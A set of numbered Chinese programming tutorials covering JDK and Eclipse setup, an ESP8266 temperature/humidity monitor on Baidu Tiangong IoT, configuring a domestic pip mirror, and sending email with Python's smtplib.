  22. 一、下载JDK1.首先需要下载java开发工具包JDK,下载地址:http://www.oracle.com/technetwork/java/javase/downloads/index.html 2.进行安装,本机为64位,所以安装了64位版本 注意:下载过程可能比较漫长,我们可以选择其他的源进行下载。 配置java环境在电脑桌面 右键点击 “此电脑”的“属性”选项--选择“高级系统设置”选项--点击下面的“环境变量”选项 点击“系统变量”下面的”新建“选项 在”变量名“处填上”Java_Home“ ”变量值“为JDK安装路径,笔者的路径是”D:\Program Files\Java\jdk1.8.0_91“ 点击”确定“选项 注意:jdk1.8.0_91为你的java版本,需要对应。 在”系统变量“中找到”Path“ 选择右边的“编辑文本”,将引号里面的全部复制“%Java_Home%\bin;%Java_Home%\jre\bin;”,到“变量值”栏的最前面,“确定” 在“系统变量”栏,“新建”,“变量名”为“CLASSPATH”,“变量值”为“.;%Java_Home%\bin;%Java_Home%\lib\dt.jar;%Java_Home%\lib\tools.jar”,“确定” 检验环境在cmd中输入java javac能看到java的相关命令。则说明安装成功。 安装esplise 到esplise的官网下载安装即可。 汉化安装eclipse2019之后,在官网下载对应的语言包: https://www.eclipse.org/babel/downloads.php 下载这个BabelLanguagePack-eclipse-zh_4.14.0.v20200113020001.zip (85.25%) 解压之后,把两个文件夹复制到eclipse文件夹下的dropins文件夹下,然后在eclipse文件夹下的eclipse.ini文件末尾添加:-nl zh 测试新建一个JAVA项目,牛刀小试。 class zhag { public static void main(String[] args) { // TODO Auto-generated method stub int a = 123; int b = 456; int c = a+b; System.out.println("加法的结果为:" + c); } 重启eclipse即可
  23. 说明:本项目是基于NodeMCU 和百度天工组合,搭建的实时监测室内温度和湿度项目。 首先我们看看效果怎么样 在线demo 硬件准备NodeMCU(esp8266开放版)DHC11杜邦线 云平台注册1,访问百度天工注册账号,如果有百度账号直接登录即可。2,在左侧「产品服务」-「物联网服务」中,选择「物接入」3,点项目名称可进入到项目详情页面,点击「新建物模型」。填写「名称」、「添加属性」。这里的属性就是我们需要采集的上报的信息,所以这里我加了两个属性:D1_Temperature 温度 number类型 D1_Humidity 湿度 number类型 4 创建完物模型,接下来创建物影子。名称自定义即可,这个在后面会用到。来自的物模型选择刚才创建的模型,点击创建即可完成。创建完成后,获取连接信息备用(连接信息中,key 是仅在生成后显示一次的)这里建议将配置信息下载。 5 购买实时数据库(用来储存温度和湿度的数据)点击时序数据库 TSDB配置即可,完成后付费即可(2元/一月) 到此,百度云的配置到此结束。 给板子刷入固件工具百度物联网固件软件ESP8266Flasher ESPEasy 百度天工适配版 刷入固件 连线VCC(+、3.3v) DATA(D4) GND(-、G ) 配置刷完系统,打开电脑 WiFi 列表,可以看到 ESP_Easy_0 作为无线热点出现了,而且是加密(密码是configesp),连接它。如果没发现,请重启 NodeMCU。 连上后,请在浏览器尝试打开 192.168.4.1,会跳转到设置页面。 选择自己的 WiFi,输入密码,点击 connect 记住这个ip地址,后面我们用这个ip地址访问即可。 在 ESPEasy 管理界面,选择 Device ,点击第一行的 Edit。 配置如下: 配置 MQTT 连接在 ESPEasy 管理界面,选择 Controllers ,点击第一行的 Edit(一定是第一行,因为只有首个支持 MQTT)。 点开编辑界面中,如图选择 Baidu MQTT,Use Hostname。 随后将第一步中,天工云平台上获取到的物影子信息,其中 Client Id 填写物影子名称。 Subscribe/Publish/lwl topic 中分别如图填写物影子对应的主题(Topic),主题可在百度云天工-控制台-物影子详情页-交互 tab 查看。 此时配置完成。 返回到物影子,要是设备提示在线,则说明配置成功。若是离线,则说明配置有问题,请仔细检查。 配置仪表盘1,首先进到物可视,点创建「仪表盘」 2,进入后,顶上有俩标签,选择「数据表」3,左侧新建数据表,因为我有俩仪表指针图和一个时序折线图,所以这一步我要创建两个数据表,一个时序数据库类型,一个物管理类型4, 创建完后,返回「仪表盘」。将需要的图拖动到空白处,点对应的图,右侧设置一下绑定数据,如下图 好了,本次简单的小项目到此结束,在实践过程中遇到问题,在下方留言吧。
  24. Python的学习过程中,往往会学习到很多库,而安装各类库的时候,往往不尽人意,下载速度从几KB到十几KB。甚至下载到一半还超时报错。这都是因为pip源是访问国外的官方源,如果需要把源改成国内源如:阿里源、网易源等,需要做如下设置。1)打开我的电脑。2)在我的电脑上的地址栏输入:%appdata%,然后回车。 3) 在这里面新建一个文件夹 pip4) 在pip文件夹里面新建一个文件叫做 pip.ini ,内容写如下即可。 [global] timeout = 6000 index-url = https://mirrors.aliyun.com/pypi/simple/ trusted-host = mirrors.aliyun.com测试下,舒服飞起来。 Linux下的配置cd ~ mkdir ~/.pip vi ~/.pip/pip.conf编辑内容,和windows一模一样即可。 hi 这是一个信封
  25. 使用SMTP发送邮件#-*- coding: UTF-8 -*- import smtplib from email.mime.text import MIMEText from email.header import Header msg_from = '[email protected]' #发送方邮箱 passwd = 'xxxx' #填入发送方邮箱的授权码(填入自己的授权码,相当于邮箱密码) msg_to = ['[email protected]'] #收件人邮箱 subject = "新年快乐!" #主题 content = "我是邮件的内容,祝你新年快乐。" msg = MIMEText(content) #放入邮件主题 msg['Subject'] = subject msg['From'] = msg_from try: #通过ssl方式发送,服务器地址,端口 s = smtplib.SMTP_SSL("smtp.163.com", 465) #登录到邮箱 s.login(msg_from, passwd) #发送邮件:发送方,收件方,要发送的消息 s.sendmail(msg_from, msg_to, msg.as_string()) print('成功') except s.SMTPException as e: print(e) finally: s.quit()效果如下